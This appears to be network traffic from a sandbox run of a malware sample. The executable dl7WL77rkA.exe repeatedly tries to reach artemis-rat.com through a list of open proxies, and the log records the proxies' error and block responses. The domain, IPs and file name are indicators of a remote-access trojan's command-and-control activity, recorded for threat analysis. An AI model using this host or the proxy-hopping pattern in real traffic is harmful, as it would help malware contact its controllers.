                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.202100039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1766192.168.2.55490838.162.3.21731283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.940078974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.362363100 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1767192.168.2.550824162.241.46.40625923876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.940386057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.998791933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.092726946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.092890024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1768192.168.2.55492838.162.15.15231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.943088055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.378967047 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1769192.168.2.554717113.204.4.142108003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.944574118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1770192.168.2.55483245.120.178.19710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.953032017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1771192.168.2.55496838.162.27.5331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.986465931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.416714907 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1772192.168.2.55483837.187.77.58379203876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.986929893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.702020884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.681914091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.514621973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1773192.168.2.554854211.222.252.18781973876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.986929893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1774192.168.2.55070314.241.203.4656783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.987593889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1775192.168.2.554707102.132.201.202803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.988262892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.437073946 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1776192.168.2.55479445.124.184.13803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.989629030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1777192.168.2.550687148.72.212.183450123876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.990160942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1778192.168.2.554863118.218.126.5494003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.990170002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.302721024 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Server: Zscaler/6.2
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                            Content-length: 13597
                                                                                                                                                                                                                                                            Data Raw: 3c 21 2d 2d 23 20 49 64 3a 20 63 6c 6f 73 65 64 70 72 6f 78 79 2e 68 74 6d 6c 20 32 38 35 31 34 34 20 32 30 32 31 2d 30 36 2d 31 36 20 30 35 3a 30 32 3a 30 36 5a 20 73 7a 68 61 6e 67 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 73 63 61 6c 65 72 20 6d 61 6b 65 73 20 74 68 65 20 69 6e 74 65 72 6e 65 74 20 73 61 66 65 20 66 6f 72 20 62 75 73 69 6e 65 73 73 65 73 20 62 79 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 69 72 20 65 6d 70 6c 6f 79 65 65 73 20 66 72 6f 6d 20 6d 61 6c 77 61 72 65 2c 20 76 69 72 75 73 65 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 73 65 63 75 72 69 74 79 20 74 68 72 65 61 74 73 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 74 69 74 6c 65 3e 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 62 79 20 5a 73 63 61 6c 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 76 61 72 20 64 65 66 4c 61 6e 67 20 3d 20 27 65 6e 5f 55 53 27 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 7a 73 63 6c 6f 75 64 2e 6e 65 74 2f 69 6d 67 5f 6c 6f 67 6f 5f 6e 65 77 31 2e 70 6e 67 22 3e 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0a 63 6f 6c 6f 72 3a 23 34 42 34 46 35 34 3b 0a 7d 0a 61 20 7b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 63 6f 6c 6f 72 3a 23 30 30 39 64 64 30 3b 0a 7d 0a 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0a 7d 0a 74 64 20 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 69 6d 67 20 7b 0a 6d 61 78 2d 68 65 69 67 68 74 3a 37 35 70 78 3b 0a 6d 61 78 2d 77 69 64 74 68 3a 34 33 30 70 78 3b 0a 7d 0a 2e 70 67 20 7b 0a 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 0a 74 6f 70 3a 30 3b 0a 62 6f 74 74 6f 6d 3a 30 3b 0a 6c 65 66 74 3a 30 3b 0a 72 69 67 68 74 3a 30 3b 0a 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 3b 0a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 0a 7d 0a 2e 70 67 3a 62 65 66 6f 72 65 20 7b 0a 63 6f 6e 74 65 6e 74 3a 22 22 3b 0a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 68 65 69 67 68
                                                                                                                                                                                                                                                            Data Ascii: ...# Id: closedproxy.html 285144 2021-06-16 05:02:06Z szhang --><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"><html><head><meta name="description" content="Zscaler makes the internet safe for businesses by protecting their employees from malware, viruses, and other security threats."><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Internet Security by Zscaler</title><script language="JavaScript">var defLang = 'en_US'</script>...<img alt="Zscaler" src="https://login.zscloud.net/img_logo_new1.png">--><style type="text/css">body {background-color:#e3e3e3;font-family:Arial, sans-serif;font-size:12px;color:#4B4F54;}a {cursor:pointer;text-decoration:none;color:#009dd0;}table {margin-top:10px;}td table {margin-top:0;text-align:center;}img {max-height:75px;max-width:430px;}.pg {position:absolute;top:0;bottom:0;left:0;right:0;overflow-x:hidden;white-space:nowrap;}.pg:before {content:"";display:inline-block;heigh


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1779192.168.2.554966159.65.245.255803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.990592003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.468436003 CET442INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.18 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 281
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1780192.168.2.55477474.118.80.24431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.992944956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.905149937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1781192.168.2.554862208.109.14.49420723876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.017537117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.811192036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905174017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.014712095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1782192.168.2.5548918.219.228.100156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.021415949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1783192.168.2.55426047.229.171.15031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.022675037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
